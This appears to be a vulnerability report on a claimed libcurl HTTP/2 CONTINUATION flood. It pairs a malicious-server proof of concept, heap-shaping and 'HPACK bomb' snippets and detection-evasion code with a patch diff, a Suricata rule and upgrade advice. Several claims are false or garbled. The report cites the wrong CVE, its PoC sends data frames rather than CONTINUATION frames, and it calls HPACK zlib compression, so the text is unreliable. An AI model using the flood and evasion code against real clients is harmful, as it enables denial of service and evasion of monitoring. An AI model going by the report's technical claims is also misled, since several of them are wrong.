HTTP/2 CONTINUATION Flood Vulnerability

# **0x00 Vulnerability Overview: Fatal Flaw in HTTP/2 Protocol Stack** ## **1. HTTP/2 Header Block Fragmentation Mechanism** * **RFC 7540 Specification**: * Header blocks are transmitted using a HEADERS frame followed by one or more CONTINUATION frames. * All frames must belong to the **same stream** and be sent **sequentially**. ## **2. libcurl Vulnerability** ```c // lib/http2.c (simplified snippet) while(recv_frame) { if(frame.type == NGHTTP2_CONTINUATION) { if(!h2->header_recvbuf) h2->header_recvbuf = Curl_add_buffer_init(); // Initialize buffer Curl_add_buffer(h2->header_recvbuf, frame.data, frame.length); // No limit } } ``` ### **Critical Issues**: * No upper limit on the number of CONTINUATION frames (RFC suggests <= 10). * No cumulative header block size check (only single-frame limit of 16KB enforced). Impact: Remote attackers can trigger uncontrolled memory allocation, leading to **OOM crashes** or potentially **remote code execution**. --- # **0x01 Advanced PoC: Crafting a Fatal Payload** ## **1. Malicious HTTP/2 Server (nghttp2-based)** ```python from nghttp2 import server import socket class ExploitHandler(server.BaseRequestHandler): def on_request(self, request): self.send_headers(stream_id=request.stream_id, headers=[(b":status", b"200")], flags=0x0) for i in range(65535): self.push_data( stream_id=request.stream_id, data=b"\x00" * 16384, flags=0x4 if i == 65534 else 0x0 ) serv = server.HTTP2Server( ("0.0.0.0", 443), ExploitHandler, ssl=True, private_key="key.pem", certificate="cert.pem" ) serv.run() ``` ## **2. Client Validation** ```bash curl -v --http2 https://malicious-server.com ``` ## **3. Monitoring Memory Usage** ```bash watch -n 0.2 "ps -p $(pgrep curl) -o pid,%mem,rss,etime,cmd" ``` **Expected Behavior**: * Memory usage exceeds 10GB within seconds. * Client crashes due to OOM or segmentation fault. --- # **0x02 Advanced Exploitation Techniques** ## **1. Heap Feng Shui Manipulation** ```python for i in range(1024): payload = b"A" * 8192 if i % 2 == 0 else b"B" * 16384 self.push_data(stream_id, payload, flags=0x0) ``` Objective: Influence heap layout to increase chances of RCE by corrupting internal structures (e.g., `curl_slist`). ## **2. HPACK Bomb (Zlib Decompression Explosion)** ```python headers = [ (b"x-bomb", b"A" * 10000), (b":status", b"200") ] self.send_headers(stream_id=1, headers=headers, flags=0x0) ``` Effect: Malicious header inflates into hundreds of MBs during decompression. --- # **0x03 Defense Strategies** ## **1. Code-level Patch (curl/libcurl)** ```diff + #define MAX_CONTINUATION_FRAMES 10 + #define MAX_HEADER_SIZE (64 * 1024) static ssize_t http2_handle_continuation(...) { + if(++h2->continuation_count > MAX_CONTINUATION_FRAMES) { + failf(data, "CVE-2023-44487: Too many CONTINUATION frames"); + return CURLE_HTTP2; + } + if(h2->header_recvbuf->size + len > MAX_HEADER_SIZE) { + failf(data, "CVE-2023-44487: Header block too large"); + return CURLE_HTTP2; + } Curl_add_buffer(h2->header_recvbuf, mem, len); } ``` ## **2. Runtime Protection** ### **a. seccomp Filter** Limit memory allocation by monitoring `mmap`/`malloc` system calls. ### **b. cgroups** ```bash cgcreate -g memory:curl-limit echo 512M > /sys/fs/cgroup/memory/curl-limit/memory.limit_in_bytes cgexec -g memory:curl-limit curl --http2 https://example.com ``` ## **3. Network-level Detection (Suricata IDS)** ```suricata alert http2 any any -> any any ( msg:"CVE-2023-44487: HTTP/2 CONTINUATION Flood Detected"; flow:established,to_client; http2.continuation_frames:>10; threshold:type both, track by_src, count 5, seconds 60; sid:202344487; rev:2; ) ``` --- # **0x04 Detection Evasion Techniques** ## **1. Low & Slow Attack** ```python for _ in range(1000): self.push_data(stream_id, b"A" * 16384, flags=0x0) time.sleep(10) ``` ## **2. Mixed-Legitimate Flow** ```python self.send_headers(stream_id=1, headers=[(b":status", b"200"), (b"content-type", b"text/html")], flags=0x4) for _ in range(1000): self.push_data(stream_id=1, b"\x00" * 16384, flags=0x0) ``` --- # **0x05 Post-Disclosure Recommendations** ## **1. Disable HTTP/2 Temporarily** ```bash curl --http1.1 https://example.com ``` For web servers: * **Apache**: `Protocols h2 http/1.1` * **Nginx**: Remove `http2` from `listen` directive ## **2. Upgrade to Patched Versions** * `curl >= 8.4.0` * `nghttp2 >= 1.58.0` * Ensure dependencies like `OpenSSL` are also up-to-date --- **Risk Rating: CRITICAL** * Remote Exploitable: YES * Impact: Denial of Service / Memory Corruption / Potential RCE **Prepared by:** Date: 2025-05-04 ## Impact ## Summary: 1